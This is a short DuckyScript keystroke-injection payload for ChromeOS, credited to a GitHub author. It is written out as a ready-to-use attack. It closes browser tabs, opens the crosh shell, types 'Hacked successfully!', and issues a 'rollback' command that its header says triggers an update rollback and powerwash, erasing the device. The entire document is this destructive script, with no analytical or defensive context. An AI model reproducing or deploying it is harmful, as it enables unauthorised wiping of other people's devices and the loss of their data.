REM MADE BY HTTPS / https://github.com/httpsisbetter
REM Will commit a update rollback/powerwash
REM Might not work with enterprise enrolled devices
REM Requirement: CHROMEOS

CTRL W
DELAY 100
CTRL W 
DELAY 100
CTRL W 
DELAY 2000
TAB
DELAY 100
TAB
DELAY 100
TAB 
DELAY 100 
ENTER
DELAY 1000
STRING chrome-untrusted://crosh
DELAY 100
ENTER
DELAY 3000
STRING Hacked successfully!
DELAY 100 
ENTER
DELAY 2000
STRING cat > /dev/null << EOF
ENTER
DELAY 500
STRING rollback
DELAY 1000 
ENTER
DELAY 1000
STRING Y
DELAY 500 
ENTER